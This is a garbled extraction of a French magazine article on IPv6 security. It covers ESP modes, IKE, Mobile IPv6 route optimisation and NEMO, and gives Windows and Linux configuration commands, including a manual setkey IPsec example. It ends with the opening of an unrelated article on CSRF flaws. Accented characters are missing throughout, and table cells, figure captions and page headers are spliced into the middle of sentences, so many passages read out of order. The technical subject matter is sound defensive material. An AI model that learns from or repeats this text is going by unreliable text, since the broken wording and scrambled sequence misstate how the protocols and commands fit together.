En mode Tunnel lextension ESP est insre avant lentte IPv6. Un nouvel entte IPv6 est alors insr en tte. La
Paquet originel : IPv6 Paquet protg : IPv6 Option Headers Tte ESP Option Headers
Ces 2 modes oprationnels sont rsums dans la Figure 7. On prcise que dans cette figure la protection est symtrique, ce qui nest pas forcment le cas, les associations de scurit tant unidirectionnelles.
Payload
Option Headers chiffr Autentifi
Payload
Queue ESP
Mode Transport
En mode Transport lextension ESP est insre de la mme manire que lextension AH, aprs lentte IPv6 et avant les enttes de niveau transport (TCP, UDP). ESP tant galement vue comme une extension dentte traite de bout en bout de la communication, celle-ci apparat aprs les extensions dentte Hop-By-Hop Option Header, Routing Header et Fragment Header. Lextension dentte Destination Options Header est quant elle place indiffremment avant ou aprs.
14 HAKIN9 3/2009
Figure 5. ESP en mode transport

Paquet originel : IPv6 Paquet protg : Nouvel entte IPv6 Tte ESP IPv6 originel Option Headers 2 chiffr Autentifi Payload Queue ESP Option Headers Payload
Figure 6. ESP en mode tunnel
IPV6
lors dun changement de domaine. Les adresses IP originelles continuent dtre utilises lors des communications. De mme les sessions TCP peuvent ainsi rester fonctionnelles lors dun dplacement entre domaines. IPv6 intgre ce concept dans le protocole MIPv6 (Mobile IPv6).
Protection ESP, mode tunnel Section non protge Protection ESP, mode transport
Concepts
Avant de poursuivre il sagit de dfinir les mots cls principaux usits par MIPv6. Rseau Mre : Rseau auquel la machine appartient initialement, Nud correspondant : machine dialoguant avec le mobile, Home Address : Adresse IPv6 dans le rseau mre, Care-of Address : Adresse IPv6 dans le rseau visit, Agent Mre : Machine du rseau mre servant dinterface entre le mobile et le nud correspondant.
Figure 7. Topologies ESP
IKE (Internet Key Exchange)

Il a t prcdemment indiqu quAH et ESP ncessitaient des cls de chiffrements par le biais des associations de scurit. Cette gestion des cls peut donc tre manuelle; mais dans un environnement consquent, une telle gestion devient irralisable. De plus, cette mthode implique une dfinition totalement statique des associations de scurit et un nonrenouvellement des cls. Le protocole IKE a donc t dvelopp pour une gestion automatique des associations de scurit, en particuliers des cls ainsi que des algorithmes usiter. IKE fait appel aux lments suivants : un protocole de gestion des associations de scurit, ISAKMP (Internet Security Association and Key Management Protocol), dfinissant des formats de paquets pour crer, modifier et dtruire des associations de scurit. Ce protocole sert galement de support pour l'change de cls prconis par les protocoles de gestion de cls. Il assure aussi l'authentification des partenaires d'une communication, un protocole d'change de cls de session bas sur SKEME et Oakley qui repose sur la gnration de secrets partags Diffie-Hellman, un domaine d'interprtation ou DOI (Domain of Interpretation) qui dfinit tous les paramtres propres l'environnement IPsec, savoir les protocoles d'changes de cls, les paramtres d'associations de scurit ngocier , les cls utiles lors de l'authentification mutuelle des quipements IPsec qui intervient en pralable toute ngociation d'association de scurit.
Ces cls peuvent tre des cls partages Public Key Infrastructure). A lheure actuelle 2 versions cohabitent, IKEv1 trs complexe et IKEv2 qui en est une version simplifie pour sa mise en uvre ainsi que par son mcanisme.
Mobilit de Machines : MIPv6
En termes de mobilit on distingue 2 mcanismes principaux : la micro-mobilit et la macro-mobilit. La micro-mobilit est celle utilise entre autre par le wifi. Les entits en cours de dplacement se rassocient des stations de base et conservent leur possibilit de connectivit au sein dun domaine. Cette gestion des handovers est relativement fine et limite la signalisation au sein du rseau. Ces mcanismes sont cependant peu efficaces au sein de plusieurs domaines. En effet les adresses IP sont dans ce dernier cas rengocies pour mapper au domaine et pouvoir ainsi tre routable. La macro-mobilit rsout ce problme en conservant une connectivit IP mme
MIPv6 utilise intensivement la notion de tunnels. Schmatiquement, les paquets transmis par le mobile dans un rseau tranger passent par lAgent Mre prsent dans le rseau mre, avant dtre retransmis au Nud correspondant. Le chemin de retour est identique. Le routage sous-jacent apporte le paquet jusqu lAgent Mre qui le retransmet au mobile dans son rseau visit. Lagent mre doit galement tout moment tre capable de localiser ses mobiles en dplacement. Il utilise pour cela un cache baptis Binding Cache associant Home Address et Care-of Address de ses diffrents mobiles. Un mcanisme de signalisation protg par IPsec en mode ESP
Mobile
(Home Address, Care-of Address)
Rseau Visit
(Prfixe : Care-Of)
Correspondant Rseau Mre

(Prfixe : Home)
Section protge Section non protge Agent Mre Tunel ESP
Figure 8. Communication MIPv6 Basique sans optimisation

3/2009 HAKIN9 15
DOSSIER
est par consquent usit pour mettre jour ce cache. Il ne sera pas fait tat des paquets MIPv6 ici, il sagit simplement de savoir que cette mise jour seffectue laide de paquets particuliers nomms Binding Update. Ceux-ci sont gnralement acquitts par lAgent Mre par des Binding Acknowledgment. Lensemble des mcanismes basiques de MIPv6 se situe au niveau de la couche IP dans le modle TCP/IP. Ils ont t models pour permettre une communication avec des entits nayant pas conscience des protocoles de mobilit. Ils n'ont aucun impact sur les couches de niveau transport et applicative. Pour le correspondant cette communication est totalement transparente. destination est celle du correspondant. Le paquet parvient lAgent Mre, qui vrifie son authentification, le dchiffre, le dsencapsule et le retransmet sur le rseau. Le correspondant pourra y rpondre de manire symtrique. Cette rponse sera capture par lAgent Mre, chiffre et authentifie avant dtre retransmise au mobile dans le tunnel ESP. En cas dun dplacement en cours de communication le binding cache aura t mis jour permettant lAgent mre de retrouver son mobile. La Figure 8 positionne ces diffrentes entits dans un contexte MIPv6.
Optimisations de routes
Les changes entre mobiles et correspondants ntant pas toujours les plus optimums en matire de routage, MIPv6 intgre un mode doptimisation pour les correspondants intgrant des
Table 1. Rle des diffrents champs de lextension dentte AH Champs Next Header Taille 8 bits Rle Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Similaire au champ Protocol en IPv4. Spcifie la longueur -2 en mots de 32 bits de lextension dentte AH. Positionn 0. Security Parameters Index utilis par le rcepteur pour trouver lassociation de scurit utiliser. Compteur incrment chaque paquet. Permet en particulier de dtecter le rejeu. Integrity Check Value. Destin la validation de lintgrit du paquet. Doit tre un multiple de 32 bits. Utilis pour des besoins dalignement dentte. Sa taille est telle que lextension dentte AH est un multiple de 64 bits (32 bits pour IPv4).
Mobilit de Machines : MIP6

Le mobile situ dans son rseau mre utilise sa Home Address pour dialoguer avec des Nuds correspondants de manire classique. Lorsquil se dplace dans un rseau visit la procdure est la suivante : Le mobile obtient une nouvelle adresse IP par combinaison de son adresse MAC et du nouveau prfixe rseau, la Care-of Address. Il dispose toujours de sa Home Address, Le mobile transmet un Binding Update lagent mre afin de mettre jour son cache dassociation. Ce paquet tant protg par IPsec en mode ESP, lauthentification, lanti-rejeu, la Lagent mre aura alors charge de capturer les paquets auparativement transmis au mobile. II utilise dans cette optique les possibilits offertes par le protocole de dcouverte des voisins (Neighbor Discovery) en annonant son adresse MAC comme destinataire de lensemble des paquets unicast destination du mobile. Les caches NDP des machines prsentent sur le lien mre seront ainsi remis jour, Lorsque le mobile souhaite dialoguer avec un nud correspondant il peut choir dutiliser son nouvel adressage, ou de masquer sa mobilit par lutilisation de sa Home Address. Dans ce dernier cas il construit un tunnel ESP avec son Agent Mre et encapsule les paquets destination de son correspondant. Ladresse source de la partie interne est ainsi la Home Address, ladresse
HAKIN9 3/2009
Payload Len RESERVED SPI Sequence Number ICV Padding
8 bits 16 bits 32 bits 32 bits Variable Selon Variable
Table 2. Construction de lentte IPv6 extrieure pour AH en mode tunnel Champs de lentte IPv6 Version DS ECN Flow Label Payload Length Next Header Hop Limit Source Address Destination Address Extensions Headers Entte Extrieur Positionn la valeur 6. Copi depuis lentte intrieur. Copi depuis lentte intrieur. Copi depuis lentte intrieur ou configur. Construit. Positionn la valeur de AH (51) Construit. Construit. Construit. Jamais copi mais peut apparatre en postambule. Entte Intrieur Aucune modification. Aucune modification. Positionn 0. Aucune modification. Aucune modification. Aucune modification. Dcrment dune unit Aucune modification. Aucune modification. Aucune modification.
16
IPV6
3/2009 HAKIN9
17
DOSSIER
Mobile Agent Mre Correspondant HoTI GoTI Protection HoT GoT Binding Update Binding Update Donnes Sans protection
la Care-Of Address du mobile. Il transmettra alors le paquet en utilisant cette Care-Of Address en destination et y ajoutera loption Routing Header de type 2 remplie avec la Home Address. Le paquet parviendra donc au mobile qui changera pralablement ladresse de destination avec la Home Address. Le paquet remontera donc galement dans les couches de manire totalement transparente.
Figure 9. Return Routability Procdure fonctions spcifiques. Il sagit de supprimer simplement la passerelle occasionne par lAgent Mre. Pour cela MIPv6 dfinit 2 nouvelles options : Routing Header de type 2 : qui est simplement une extension dentte Routing Header contenant la Home Address du mobile Home Address Option : qui est une sous-option de lextension dentte Destination Option Header trait uniquement par le rcepteur du paquet. Le paquet subira le routage classique entre le mobile et le correspondant, remontera dans la pile MIPv6 de ce correspondant qui changera Care-of Address du champ adresse source et Home Address prsentes dans loption Home Address Option. Pour la pile IPv6, le paquet sera transparent comme provenant directement du mobile depuis son rseau Mre. Dans le cas o ce paquet est protg par IPsec, les vrifications seront donc bases sur ladresse mre. Avant de rpondre, le correspondant cherchera dans sa table dassociation
Ce mcanisme donne donc des trajectoires optimums en matire de routage et permet de limiter les contraintes en matire dingress et doutgress filtering. Ce mcanisme de mise jour d'association pose cependant d'importants problmes en matire de scurit. En effet, il est ais de protg les changes de signalisation entre le mobile et l'agent mre du fait de la relation administrative qui
Return Routability procdure

Cette procdure est destine la protection partielle des associations de scurit entre mobile et correspondant dans le cas de loptimisation de route. Elle repose sur une utilisation de 4 messages principaux : HoTI : Home Test Init , CoTI : Care-of Test Init,
Lorsqu'un correspondant supporte l'optimisation de routage, il maintient tout comme l'Agent Mre une table des associations pour tous les mobiles avec lesquels il est en communication. Une vrification axe autour dICMPv6 est pralable avant toute optimisation. Le principe est alors assez proche de celui usit avec lAgent Mre : Le mobile en dplacement transmet un Binding Update au correspondant pour lui faire tat de sa nouvelle localisation aprs en avoir fait de mme son Agent Mre. Ce correspondant mettra alors jour son Binding Cache. Lorsque le mobile veut transmettre un message au correspondant, il utilise en adresse source sa Care-of Address mais ajoute loption Home Address Option.
HAKIN9 3/2009
Figure 10. Commande netsh show sous Windows XP
18
IPV6
HoT : Home Test , CoT : Care-of Test. empruntent des chemins distincts. Dans le cas contraire il lui serait ais de calculer Kbm et de gnrer des faux messages dassociation. Cette coute nest pas faisable dans le rseau visit puisque les changes entre Agent Mre et mobile sont chiffrs. Pratiquement cette attaque est aise dans le rseau du correspondant mais celle-ci nest pas value comme tant plus risque que celles que lon peut retrouver dans un contexte sans mobilit par simple IPspoofing, NDP spoofing Afin de rduire les risques, les nonces ainsi que la cl Kcn sont rgulirement mis jour.
Les correspondants intgrant loptimisation de route doivent pralablement disposer de nonces ainsi que dune cl secrte note Kcn. La procdure usite est la suivante : un message HoTI est mis depuis la Home Address du mobile vers le correspondant via l'agent mre. Il contient une valeur alatoire sur 64 bits, le Home Init cookie, paralllement un message CoTI est mis depuis la care-of address du mobile, directement vers le nud correspondant. Celui-ci contient une seconde valeur alatoire sur 64 bits, le Care-of Init cookie, en rponse au message HoTI, un message HoT, est mis par le correspondant destination de la Home Address du mobile via l'Agent Mre. Ce paquet contient entre autre lindex dun nonce choisi par le correspondant ainsi quun Home Keygen token calcul par : premier
(64, HMAC _ SHA1 (Kcn, (home address | nonce | 0 )))
Mobilit de Rseaux : NEMO

MIPv6 gre la mobilit d'un hte tandis que NEMO assure la mobilit d'un rseau IPv6 entier, appel rseau mobile. Dans le cas de NEMO, la complexit est centralise sur un quipement ddi : le routeur mobile. Ainsi, chaque mouvement (lorsque le rseau mobile se dplace d'un rseau d'accs vers un
Table 3. Rle des diffrents champs de lextension dentte ESP Champs SPI Sequence Number IV Taille 32 bits 32 bits Variable Selon lalgorithme usit Variable Variable Rle Security Parameters Index utilis par le rcepteur pour trouver lassociation de scurit utiliser. Compteur incrment chaque paquet. Permet en particulier de dtecter le rejeu. Vecteur dinitialisation ventuel pour les algorithmes de chiffrement. Traffic Flow Confidentiality. Utilis pour une protection contre les attaques statistiques. Utilis pour des besoins dalignement dentte. Sa taille est telle que lextension dentte ESP est un multiple de 64 bits (32 bits pour IPv4). Indique la taille du champ Padding en octets. Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Similaire au champ Protocol en IPv4. Integrity Check Value. Destin la validation de lintgrit du paquet. Doit tre un multiple de 32 bits.
TFC Padding Padding
Pad Length Next Header
8 bits 8 bits
de mme, en rponse au message CoTI, un message CoT est mis par le correspondant vers la Careof Address du mobile. Ce paquet contient entre autre lindex dun autre nonce choisi par le correspondant ainsi quun Home Keygen token calcul par : premier (64,
HMAC _ SHA1 (Kcn, (care-of address | nonce | 0 )))
ICV
Variable Selon lalgorithme usit
Table 4. Construction de lentte IPv6 extrieure pour ESP en mode tunnel Champs de lentte IPv6 Version DS ECN Flow Label Payload Length Next Header Hop Limit Source Address Destination Address Extensions Headers Entte Extrieur Positionn la valeur 6. Copi depuis lentte intrieur. Copi depuis lentte intrieur. Copi depuis lentte intrieur ou configur. Construit. Positionn la valeur de ESP (50) Construit. Construit. Construit. Jamais copi mais peut apparatre en postambule. Entte Intrieur Aucune modification. Aucune modification. Positionn 0. Aucune modification. Aucune modification. Aucune modification. Dcrment dune unit Aucune modification. Aucune modification. Aucune modification.
A lissue de ces diffrentes tapes, le mobile calcule une cl note Kbm :

Kbm = SHA1 ( "home keygen token" | "care-of keygen token")
La Figure 9 prsente le cheminement de ces diffrents messages au travers de lInternet. Cette cl sera utilise lors de la mise jour des associations pour authentifier le mobile par le calcul dun HMAC. Cette procdure repose sur lhypothse forte quaucun espion ncoute la fois les messages CoT et HoT qui normalement
3/2009 HAKIN9
19
DOSSIER
autre) est transparent pour l'ensemble des htes IPv6 du rseau mobile. Un hte IPv6 standard peut ainsi bnficier d'une connectivit permanente au sein d'un rseau mobile sans avoir toutefois besoin de protocoles additionnels. NEMO, coupl avec certaines extensions, gre notamment la mobilit des rseaux IPv6, la est activ par dfaut. Sous XP ou Server 2003, il vous faudra lactiver au pralable. Selon les versions de Windows les mcanismes disponibles sont plus ou moins complets. La mobilit IPv6 ne prend en compte que la partie correspondant ; ni Home Agent ni Nud Mobile ne sont disponibles ; Sous Windows XP et Server 2003, IPsec pour IPv6 offre les mcanismes AH et ESP mais le chiffrement ainsi que la gestion automatique des cls nest pas disponible. Seul Vista et Server 2008 offrent ces fonctionnalits. Vista et Server 2008 permettent une utilisation de DHCPv6.
Activation de la pile IPv6 & Configuration des Adresses

Ce besoin ne se retrouve que sous XP et Windows Server 2003 dont la pile IPv6 est par dfaut dsactive. Cette activation se fait par le biais de loutil ipv6.exe sous Windows XP o de la commande netsh disponible sur toutes les versions. Sous Windows XP, il sagit dexcuter :
ipv6 install
Pratique & Mise En uvre
La majeure partie des Systmes dexploitation, des softwares des quipements rseaux actuels disposent dun support IPv6. Vous pourrez le vrifier sur le site de lIPv6 Ready Logo Committee, programme mondial de certification IPv6. Vous obtiendrez sur ce site le dtail des implmentations actuellement certifies et vous pourrez aisment y constater limportant retard de lEurope. Les infrastructures rseaux europennes ont galement accumules un retard considrable dans cette migration Et pourtant les rseaux de lenseignement et de la recherche proposent depuis dj plusieurs annes un support Natif dIPv6 voir du multicast IPv6. Heureusement quelques ISP (Internet Service Provider), tels que Free, offrent depuis quelques mois un adressage IPv6. Ce paragraphe a pour objectif de vous faire apprhender la mise en uvre basique dIPv6 sur les principaux systmes usits, savoir Windows et Linux. On suppose que vous disposez dores et dj dun adressage IPv6 parce que vous tes par exemple dans une des situations prcdemment voques. On rappelle que les Internet IPv4 et IPv6 sont bien distincts mme si une utilisation des machines en double pile permet la superposition de certaines portions. Dans le cas contraire, si vous dsirez plus quun rseau local, il vous faudra utiliser un des mcanismes de transition dcrit dans larticle prcdent. Nous vous conseillons prfrentiellement un tunnel broker et en second choix un tunnel 6to4.
Bien entendu les interfaces concernes doivent accepter la connectivit TCP/IPv6 dans le menu Proprits adquat. Une adresse Lien-locale associe chacune de vos carte rseau sera
Figure 11. Ping6 www.google.fr
Avec Windows
La majeure partie des versions courantes de Windows disposent dun support IPv6 : Vista, XP SP1, XP SP2, Server 2003, 2008. Sous Vista et Server 2008 ce support
20 HAKIN9 3/2009
Figure 12. Dchiffrement IPsec avec Wireshark
IPV6
3/2009 HAKIN9
21
DOSSIER
alors automatiquement configure par concatnation du prfixe fe80 et de votre identifiant dinterface dfini depuis ladresse MAC associe. Les interfaces relies un rseau IPv6 constitu dun routeur annonant des Router Advertisement, obtiendront de mme automatiquement une adresse globale unicast, unique, routable et contenant ladresse MAC de linterface concerne. La commande ipconfig /all (ou netsh show) vous prouvera votre connectivit. La figure 10 vous montre une telle configuration sous Windows XP. Vous constaterez galement une adresse supplmentaire, qualifie de Temporaire. Il sagit en fait dune adresse globale, de dure de vie relativement courte destine au masquage de ladresse MAC (disponible depuis le SP2). Au besoin vous pourrez la dsactiver par :
ipv6 p gpu useTemporaryAddresse no
Netsh (et/ou ipv6.exe sous Windows XP). Hormis celles prcdemment dfinies, les commandes essentielles sont indiques dans le Tableau 5.
Accs Web en IPv6

Classiquement en IPv4, les URLs (Uniform Resource Locator) utilises dans les accs HTTP (HypertexT Transfert Protocol) utilisent le nommage DNS (Domain Name System). Avant toute requte ladresse du serveur HTTP est donc gnralement
pralablement traduite par le biais des serveurs DNS. Avec IPv6, il en est de mme, le browser dans un premier temps recherche lensemble des adresses IP associes au serveur HTTP. Si celui-ci dispose dune adresse IPv6, il tentera dans un premier temps de le joindre par IPv6. En cas dchec, cest le protocole IPv4 qui sera utilis. Nous rappelons quil nest pas indispensable que le serveur DNS soit adress en IPv4 pour retourner des adresses IPv6.
Table 5. Les commandes essentielles IPv6 sous Windows Commande Netsh

netsh interface ipv6 show interface netsh interface ipv6 set interface [[interface=]String] [[forwarding=]{enabled | disabled}] [[advertise=]{enabled | disabled}] [[mtu=]Integer] [[siteid=]Integer] [[metric=]Integer] [[store=]{active | persistent}]
Rle Affiche les interfaces IPv6 Permet dactiver le forwarding des interfaces, les annonces de Router Advertisement
Connectivit, chemin
Lorsque vous disposerez dune adresse routable ou simplement pour tester la connectivit entre deux machines, vous pourrez utilisez la commande ping6 qui est le pendant de ping pour IPv4. Cette commande gnre un ensemble de paquets ICMPv6 Echo Request et affiche les rponses associes ICMPv6 Echo Reply. La Figure 11 montre un tel ping6 sur www.google.fr dsormais adressable en IPv6. Les paquets rsultants de cette commande sont galement indiqus par capture du trafic avec Wireshark. En IPv4, pour connatre le trajet suivi par les paquets, on utilise gnralement la commande tracert. En IPv6, il sagit dsormais de tracert6
netsh interface ipv6 add address [[interface=]String] [address=]IPv6Address [[type=]{unicast | anycast}] [[validlifetime=]{Integer | infinite}] [[preferredlifetime=]{Integer | infinite}] [[store=]{active | persistent}] netsh interface ipv6 show bindingcacheentries
Permet dajouter des adresses IPv6 aux interfaces
Affiche le Binding cache utilis par MIPv6 Affiche les routes IPv6 Ajoute une route IPv6 dans la table de routage
netsh interface ipv6 show routes [[level=]{normal | verbose}] [[store=]{active | persistent}]
netsh interface ipv6 add route [prefix=]IPv6Address/Integer [[interface=]String] [[nexthop=]IPv6Address] [[siteprefixlength=]Integer] [[metric=]Integer] [[publish=]{no | yes | immortal}] [[validlifetime=]{Integer | infinite}] [[preferredlifetime=]{Integer | infinite}] [[store=]{active | persistent}] netsh interface ipv6 renew [[interface=]String]
Permet la rinitialisation des adresses IPv6
Table 6. Commandes principales pour la configuration dIPv6 sous linux Commande ip

ip -6 address show [dev <priphrique>] ip -6 addr add <adresseipv6>/ <longueurduprfixe> dev <interface> ip -6 route add <rseauipv6>/ <longueurduprfixe> via <adresseipv6> [dev <priphrique>] ip -6 neigh add <adresseIPv6> lladdr <adressedelacouche-lien> dev <priphrique>
Cache des voisins (NDP Cache)

La rsolution MAC/Adresse en IPv4 donne naissance au cache ARP obtenu par arp an par exemple. En IPv6, il sagit dsormais du cache NDP qui peut tre obtenu par :
ipv6 nc , ou netsh interface ipv6 show neighbors.
Rle Affiche les adresses IPv6 Ajoute une adresse IPv6 Affiche les routes IPv6 Ajoute une route IPv6 Affiche les voisins NDP Ajoute un voisin NDP
ip -6 route show [dev <priphrique>]
Diverses Commandes
Lensemble des configurations essentielles IPv6 sous Windows seffectuent laide de
22 HAKIN9 3/2009
ip -6 neigh show [dev <priphrique>]
IPV6
A lheure actuelle la majeure partie des navigateurs supporte IPv6 par dfaut, Firefox, Internet Explorer A titre dexemple vous pourrez vous connecter sur www.kame.net. Si vous disposez dun accs extrieur IPv6 ainsi que dun browser compatible vous devriez voire en premire page une tortue anime. Le cas chant celle-ci sera fixe. Avec IPv6, les adresses tant 4 fois plus longues, les URLs contenant des IPs devraient encore moins se pratiquer. Cependant ceci reste possible et pour diffrencier les :: de ladresse avec la section port de lURL, il faut entourer lIP de [ ]. (Exemple : http://[2001:4860:a003::68] pour accder google en IPv6). Le systme Linux tant lun des mieux documents, si lune des options vous manque vous pouvez toujours utiliser la commande man (exemple : man 8 ip). En dernier point il vous faudra peut-tre activer un protocole de routage intradomaine (Ripng, OSPfv3) voir interdomaine (Is-Is, BGP-4+).
Mise en uvre mode routeur

Afin de mettre en place un routeur et/ou une passerelle vous devez activer le forwarding entre les diffrentes interfaces rseaux. Ceci peut tre ralis par le biais de fichiers de configuration spcifiques chaque distribution (gnralement sous larborescence /etc/sysconfig/network) ou directement par dialogue avec le Kernel. Ce dialogue est temporaire et chaque reboot, il sera rinitialis (sauf utilisation de script de dmarrage, gnralement /etc/ rc.local). Il se ralise par des appels la commande sysctl ou par criture dans les fichiers propres au kernel. Il sagit sous IPv6 de larborescence /proc/sys/net/ipv6. Le fait dcrire 1 dans le fichier /proc/sys/net/ipv6/conf/all/ forwarding activera le forwarding entre toutes les interfaces. Au besoin, le contrle du forwarding par interface doit tre ralis en utilisant les jeux de rgles de netfilterIPv6 ( laide dip6tables) en spcifiant les priphriques d'entre et de sortie. Il vous faudra certainement en plus activer les Router Advertisements afin de permettre aux machines prsentes sur le lien de sautoconfigurer. Ces paquets sont gnrs suite au dmarrage du dmon radvd. Ce dmon utilise un fichier de configuration prsent gnralement dans /etc/radvd.conf. Ce fichier stipule les principaux paramtres des Router Advertisements, savoir : le prfixe, la dure de vie du prfixe, la frquence des envois d'annonce,
Commandes et outils principaux

Les commandes principales disponibles sous Linux sont quivalentes celle prcdemment voques pour Windows. Les principales sont les suivantes :
ping6 (Packet INternet Grouper) :
pour diagnostiquer la connectivit rseau. (Exemple : ping6
Avec Linux
Quelle que soit la distribution contemporaine utilise, celle-ci contient IPv6. Vous pourrez nanmoins tester la prsence de son support dans le noyau par vrification de la prsence du chemin : /proc/net/if_inet6. Le module IPv6 doit galement tre charg avant toute utilisation. Un appel lsmod vous le confirmera.
donnera lensemble des interfaces prsentes sur le lien-local, traceroute6 : pour dtecter le chemin emprunt par les paquets, tracepath6 : similaire au traceroute6, trace le chemin vers une destination donne tout en dcouvrant la MTU le long de ce chemin, nslookup, host : utiles pour la rsolution DNS en v4 ou v6.
[-I <priphrique>] FF02::1 vous
Activation de la pile IPv6 & Configuration des Adresses

Sous Linux lensemble des configurations IPv6 peut tre ralis laide des anciennes commandes ifconfig, netstat Depuis les noyaux au moins suprieur au 2.4, le sous-systme rseau a t compltement rcrit. Liproute2 tend ainsi grandement les possibilits et centralise les configurations rseaux. La commande principale est ip. Le Tableau 6 prsente donc quelques une des options principales pour configurer Ipv6. Table 7. Rfrences Lien http://livre.point6.net/index.php http://ipv6ready.org http://www.deepspace6.net/docs/ipv6_ status_page_apps.html http://mirrors.deepspace6.net/Linux+IPv6HOWTO-fr/ http://www.linux-france.org/prj/inetdoc/ guides/Advanced-routing-Howto/ http://wiki.wireshark.org/ESP_Preferences
Lensemble des outils classiques rseaux disponibles sur Linux a t adapt IPv6 : ssh, telnet, ftp, netcat, nmap Le firewall iptable classique dispose galement dune variante baptise ip6table pour IPv6.
Mise en uvre dIPsec

La pile IPsec est maintenant intgre en natif sur les noyaux 2.5.47 et suprieurs ; les versions infrieures ncessitaient linstallation de piles spcifiques style FreeS/WAN ou celle du projet japonais USAGI. Limplmentation actuelle repose dailleurs sur celle du projet USAGI. Elle peut cependant ne pas tre active par dfaut pour IPv6 ; il vous faudra donc potentiellement relancer pralablement une compilation du noyau et y activer AH, ESP voir IPComp (Compression de charge IP). La configuration des politiques IPsec ainsi que des cls et algorithmes en mode partag seffectue laide de loutil setkey, drivant du projet KAME et fournie avec le package ipsec-tools. Si vous choisissez un mode de configuration automatique des associations de scurit, il vous faudra user dun outil supplmentaire, racoon ou racoon2 selon la version dIKE choisie.
3/2009 HAKIN9 23
Titre IPv6 Thorie et Pratique - Gisle Cizault Site de lIPv6 Ready Logo Committee Statut des applications rseaux supportant IPv6 HOWTO IPv6 pour Linux HOWTO du routage avanc et du contrle de trafic sous Linux Le module de dchiffrement et dauthentification ESP pour Wireshark
DOSSIER
Par simplification nous choisirons un mode manuel de gestion des associations de scurit.
3ffe::2 : par ESP (Chiffrement :
aes-cbc, cl : aescbcencryption ; Authentification : hmac-sha1, cl : hmacsha1authenticati ; SPI : 10); 3ffe::3 : par ESP (Chiffrement : 3descbc, cl : 3descbcencryptiontesting ; Authentification : hmac-sha1, cl : hmacsha1authenticati ; SPI : 11)
Chacune de ces diffrentes machines devra donc tre configure pour prendre en compte ce paramtrage IPsec. Ceci Table 8. Liste des RFCs relatives IPv6 Norme RFC 2403 RFC 2404 RFC 2405 RFC 2409 RFC 2451 RFC 3566 RFC 3602 RFC 3686 RFC 3775 RFC 3776 RFC 3963 RFC 4109 RFC 4301 RFC 4302 RFC 4303 RFC 4306 RFC 4307 RFC 4385 RFC 4835 RFC 4877 RFC 4885 RFC 4886 RFC 4887 RFC 4888 RFC 4889
24 HAKIN9 3/2009
peut se raliser par dfinition dun fichier de configuration nomm par exemple setkey.conf utilisant le format suivant (Listing 1). Si lon considre 3ffe::1, Il faut donc dans un premier temps dfinir les SPD (Security Policy Database) afin que tout trafic sortant en direction de 3ffe:: 2 et 3ffe::3 soit protg par Ipsec (Listing 2). Dans un second temps il faut indiquer les SPI, les cls ainsi que les algorithmes utiliser au niveau de la SAD (Listing 3). Bien entendu, 3ffe::2 et 3ffe:: 3 doivent comporter les SPDs et SADs correspondantes afin que toute trafic reu
puisse tre authentifi et dchiffr. La configuration de ces diffrents lments sur 3ffe::2 sera donc proche de Listing 4. Ainsi tout trafic provenant de 3ffe::1 sera protg par ESP en mode transport avec les cls et algorithmes dfinies. Afin dactiver ces paramtres il vous faudra utiliser setkey : setkey f
setkey.conf
Titre The Use of HMAC-MD5-96 within ESP and AH The Use of HMAC-SHA-1-96 within ESP and AH The ESP DES-CBC Cipher Algorithm With Explicit IV The Internet Key Exchange (IKE) The ESP CBC-Mode Cipher Algorithms The AES-XCBC-MAC-96 Algorithm and Its Use With IPsec The AES-CBC Cipher Algorithm and Its Use with IPsec Using Advanced Encryption Standard (AES) Counter Mode With IPsec Encapsulating Security Payload (ESP) Mobility Support in IPv6 Using IPsec to Protect Mobile IPv6 Signaling Between Mobile Nodes and Home Agents Network Mobility (NEMO) Basic Support Protocol Algorithms for Internet Key Exchange version 1 (IKEv1) Security Architecture for the Internet Protocol IP Authentication Header IP Encapsulating Security Payload (ESP) Internet Key Exchange (IKEv2) Protocol Cryptographic Algorithms for Use in the Internet Key Exchange Version 2 (IKEv2) Cryptographic Algorithm Implementation Requirements for Encapsulating Security Payload (ESP) and Authentication Header (AH) Cryptographic Algorithm Implementation Requirements for Encapsulating Security Payload (ESP) and Authentication Header (AH) Mobile IPv6 Operation with IKEv2 and the Revised IPsec Architecture Network Mobility Support Terminology Network Mobility Support Goals and Requirements Network Mobility Home Network Models Network Mobility Route Optimization Problem Statement Network Mobility Route Optimization Solution Space Analysis
Vous remarquerez que seuls les changes depuis 3ffe::1 vers 3ffe: :2 ainsi que ceux depuis 3ffe::1 vers 3ffe::3 sont protgs. La rciproque nest pas vraie ; par exemple les paquets provenant de 3ffe::2 vers 3ffe::1 ne sont en aucun cas protgs. Vous pouvez ds prsent vrifier ces assertions par un ping depuis 3ffe::1 vers 3ffe::3. Les Echo Request doivent tre protgs par IPsec tandis que les Echo Reply circuleront en clair. Afin de faciliter cette analyse vous pourrez utiliser Wireshark ainsi que le module ESP intgr permettant le dchiffrement des paquets.
Conclusion
Au travers de ces diffrents articles vous avez pu vous initier aux divers mcanismes principaux composant IPv6. Ces mcanismes sont relativement nombreux, la modification de la couche rseau ncessite en effet beaucoup d'adaptation. IPv6 est un protocole mature, ses premires bases ont t normalises en 1998, et n'ont cesse d'tre raffine depuis par l'IETF. La majeure partie des systmes d'exploitation permettant actuellement de mettre en uvre ce protocole; le nombre d'adresses IPv4 allouable tant presque puis, la transition est inluctable c'est donc ds maintenant qu'il s'agit de se familiariser avec ses concepts, sa mise en uvre et les nouvelles opportunits offertes par IPv6.
Rfrences
Vous trouverez dans les Tableaux 7 et 8, les rfrences, normes ainsi que des liens Web o vous obtiendrez des renseignements complmentaires sur les divers mcanismes voqus travers cet article. Frederic Roudaut
Il travaille actuellement chez Orange Labs (anciennement France Telecom R&D) Sophia Antipolis pour le compte dOrange Business Services IT&Labs depuis 1 an et demi.
IPV6
3/2009 HAKIN9
25
PRATIQUE
AMAR PAUL
Les Failles CSRF,

Quels sont les risques ?
Degr de difficult
Les failles Cross-Site Request Forgeries ou communment appeles CSRF ou encore XSRF restent un vecteur d'attaque trs mconnu par rapport d'autres vulnrabilits Web tels que les Injection SQL.

Le principe des failles CSRF, leur utilisation, mais aussi le moyen de scuriser son site web pour prvenir les utilisateurs de ces risques.

Notions en PHP, (x)HTML, ainsi que les vulnrabilits Web telles que les XSS (Cross-Site Scripting.) 26 HAKIN9 3/2009
